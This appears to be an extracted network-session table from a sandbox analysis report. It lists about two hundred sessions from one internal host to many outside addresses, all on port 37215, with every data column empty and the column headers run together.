                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15480192.168.2.235584643.242.143.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15481192.168.2.234351047.109.211.20437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15482192.168.2.2338448197.169.55.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15483192.168.2.2354078157.194.107.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15484192.168.2.234789490.60.110.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15485192.168.2.2339132197.155.45.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15486192.168.2.233990241.205.177.12037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15487192.168.2.235869641.152.58.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15488192.168.2.2359028197.14.180.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15489192.168.2.2353402175.201.93.24537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15490192.168.2.2358860157.177.8.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15491192.168.2.2341088197.205.222.21537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15492192.168.2.234467041.26.81.8037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15493192.168.2.2352996222.244.90.4337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15494192.168.2.2344750169.91.206.14837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15495192.168.2.234395423.164.84.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15496192.168.2.2351564175.179.246.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15497192.168.2.2351178197.149.74.4237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15498192.168.2.2334954157.155.133.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15499192.168.2.2354140197.53.79.15537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15500192.168.2.2335580197.249.178.6237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15501192.168.2.234215841.194.144.20737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15502192.168.2.2347030172.248.126.12137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15503192.168.2.2348178114.222.34.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15504192.168.2.235238441.126.34.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15505192.168.2.233471841.235.28.13137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15506192.168.2.2350432193.39.86.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15507192.168.2.235805241.134.11.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15508192.168.2.2333656157.39.196.16037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15509192.168.2.2334578201.181.117.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15510192.168.2.235422642.24.40.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15511192.168.2.235578441.206.9.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15512192.168.2.2356502157.85.101.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15513192.168.2.2351624157.7.2.16837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15514192.168.2.2333098104.87.157.7337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15515192.168.2.2353274157.150.23.15937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15516192.168.2.2348960157.170.68.11237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15517192.168.2.234464441.122.181.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15518192.168.2.2356508157.203.154.14237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15519192.168.2.2350314222.0.8.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15520192.168.2.2355722173.189.91.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15521192.168.2.2357916197.102.11.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15522192.168.2.234529841.157.129.637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15523192.168.2.235851241.108.233.1137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15524192.168.2.235902641.171.175.18237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15525192.168.2.2349106197.168.76.16137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15526192.168.2.235038441.76.179.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15527192.168.2.2360676157.8.179.4737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15528192.168.2.2356136157.22.95.13337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15529192.168.2.2346320157.134.56.1437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15530192.168.2.234410841.170.58.21637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15531192.168.2.235329041.22.42.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15532192.168.2.234840441.99.123.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15533192.168.2.2347046157.15.209.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15534192.168.2.2350822157.126.79.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15535192.168.2.234553274.76.22.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15536192.168.2.2359030157.253.19.6737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15537192.168.2.234306841.241.196.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15538192.168.2.235409478.22.86.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15539192.168.2.2351880197.44.149.14437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15540192.168.2.2341920204.191.160.18437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15541192.168.2.2342044147.217.64.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15542192.168.2.2340514197.77.87.19537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15543192.168.2.234194441.139.87.17537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15544192.168.2.235306241.193.26.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15545192.168.2.235543641.205.106.15037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15546192.168.2.2357106157.236.168.10337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15547192.168.2.234978493.36.210.24337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15548192.168.2.234595041.126.51.2837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15549192.168.2.2349412157.50.98.21837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15550192.168.2.235522841.146.107.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15551192.168.2.233507841.3.116.21037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15552192.168.2.235949441.132.133.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15553192.168.2.2359108157.99.68.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15554192.168.2.2346260197.194.185.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15555192.168.2.2336010157.61.204.4937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15556192.168.2.234667241.117.211.17637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15557192.168.2.233587498.97.111.18537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15558192.168.2.2350206197.124.154.4137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15559192.168.2.233336841.203.21.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15560192.168.2.23440564.200.109.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15561192.168.2.2335588157.197.78.18037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15562192.168.2.2333140157.70.246.437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15563192.168.2.2342098194.122.178.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15564192.168.2.2355978157.195.119.23537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15565192.168.2.2356430157.6.22.23237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15566192.168.2.2352980157.125.254.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15567192.168.2.2340960179.255.4.3037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15568192.168.2.2351988197.165.255.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15569192.168.2.2343358157.236.233.22237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15570192.168.2.234193441.22.77.7037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15571192.168.2.2344468135.115.154.16437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15572192.168.2.2355404197.89.67.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15573192.168.2.2341642157.86.208.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15574192.168.2.233519041.34.105.19737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15575192.168.2.2349786157.57.71.5337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15576192.168.2.233304641.220.84.4537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15577192.168.2.2334456197.138.115.7137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15578192.168.2.2333106197.45.2.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15579192.168.2.233817241.193.128.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15580192.168.2.2341108197.76.104.12737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15581192.168.2.235797640.130.81.14737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15582192.168.2.2340742203.188.35.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15583192.168.2.235881041.244.108.15737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15584192.168.2.2333146170.51.115.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15585192.168.2.2352532157.57.249.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15586192.168.2.234467241.17.91.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15587192.168.2.234377241.96.80.7837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15588192.168.2.233296641.187.211.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15589192.168.2.2342568157.184.51.4837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15590192.168.2.234149041.183.206.837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15591192.168.2.235734476.143.215.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15592192.168.2.2345142197.30.88.2437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15593192.168.2.2341568197.38.120.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15594192.168.2.236050641.145.141.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15595192.168.2.234770447.41.142.13837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15596192.168.2.2353782157.136.247.16537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15597192.168.2.2351656197.14.66.2337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15598192.168.2.2345062197.200.7.5837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15599192.168.2.2351634157.231.188.3137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15600192.168.2.234463841.109.173.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15601192.168.2.2358600157.157.10.10437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15602192.168.2.2346486138.24.8.22737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15603192.168.2.234923441.208.57.11437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15604192.168.2.2353650157.86.195.3637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15605192.168.2.2332958220.241.63.14637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15606192.168.2.2336102157.25.198.5237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15607192.168.2.2358796157.50.64.13737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15608192.168.2.2352468197.184.18.7637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15609192.168.2.234779431.88.233.12837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15610192.168.2.2344696197.76.95.12237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15611192.168.2.2360786108.220.242.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15612192.168.2.2357274157.70.109.337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15613192.168.2.235782041.19.55.9637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15614192.168.2.2349632197.123.158.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15615192.168.2.2334446159.197.100.5937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15616192.168.2.2351550197.106.203.6937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15617192.168.2.234724441.71.250.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15618192.168.2.2333788157.82.195.17137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15619192.168.2.2344980141.193.157.19237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15620192.168.2.2351528157.142.179.3437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15621192.168.2.2333462188.140.233.17437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15622192.168.2.235179441.228.171.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15623192.168.2.2337114179.36.136.13237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15624192.168.2.2340504157.145.37.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15625192.168.2.2339432142.8.29.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15626192.168.2.236034641.14.146.23737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15627192.168.2.234867441.47.27.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15628192.168.2.2333320210.241.167.2637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15629192.168.2.2333110197.248.223.24437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15630192.168.2.235753441.163.124.5637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15631192.168.2.234463241.173.128.2237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15632192.168.2.2345138197.151.224.17937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15633192.168.2.2347630197.101.195.22637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15634192.168.2.2333124157.183.213.11637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15635192.168.2.2343318157.195.121.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15636192.168.2.2353634197.26.154.5437215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15637192.168.2.2353956197.114.94.10037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15638192.168.2.2338954197.241.213.13937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15639192.168.2.2341482157.115.107.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15640192.168.2.233576841.235.68.15237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15641192.168.2.2351316197.131.228.16637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15642192.168.2.234053241.171.96.037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15643192.168.2.2348474157.223.246.5037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15644192.168.2.2345814111.90.63.6137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15645192.168.2.2337030157.138.67.1337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15646192.168.2.2354506157.156.49.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15647192.168.2.233589054.57.156.9937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15648192.168.2.2345544112.173.254.19637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15649192.168.2.2358616157.70.161.19837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15650192.168.2.234810241.170.218.6637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15651192.168.2.2354994157.22.83.15337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15652192.168.2.2350822197.91.18.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15653192.168.2.23585022.49.60.23837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15654192.168.2.2355472104.25.239.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15655192.168.2.236033641.136.177.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15656192.168.2.2338250157.105.48.24037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15657192.168.2.2346142197.135.217.14137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15658192.168.2.2342578157.228.218.17237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15659192.168.2.234033670.94.203.7237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15660192.168.2.234646249.128.81.23937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15661192.168.2.2348714113.154.132.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15662192.168.2.233640248.31.83.25537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15663192.168.2.233776641.248.132.20337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15664192.168.2.2358916157.205.221.16237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15665192.168.2.2350858157.70.66.3737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15666192.168.2.2352894157.167.225.11537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15667192.168.2.2348332157.25.120.22537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15668192.168.2.2340432197.105.47.17337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15669192.168.2.2334278179.239.193.2037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15670192.168.2.23507602.245.141.3237215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15671192.168.2.2345752212.212.243.11337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15672192.168.2.234935241.80.53.21337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15673192.168.2.2357268157.228.106.8837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15674192.168.2.2360008197.116.210.1737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15675192.168.2.235128041.159.87.1037215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15676192.168.2.2349508197.100.237.3837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15677192.168.2.235214841.119.100.12337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15678192.168.2.234897441.21.251.8937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15679192.168.2.2356452157.26.126.137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15680192.168.2.233599641.2.239.11837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15681192.168.2.2360844157.136.233.2537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15682192.168.2.2360032197.104.220.13637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15683192.168.2.2345228157.20.248.10837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15684192.168.2.2336682197.228.87.24137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15685192.168.2.233441641.70.213.12537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15686192.168.2.2342494161.112.191.9337215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15687192.168.2.235215441.46.211.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15688192.168.2.234969841.230.45.24637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15689192.168.2.2333052157.229.231.11937215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15690192.168.2.2343626157.5.4.8137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15691192.168.2.235090645.66.55.6837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15692192.168.2.2358876157.229.195.24837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15693192.168.2.2342396157.107.15.17837215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15694192.168.2.2349324157.21.14.23637215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15695192.168.2.2336418197.157.253.24737215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15696192.168.2.235512641.138.30.2137215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          15697192.168.2.234176641.141.114.3537215
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
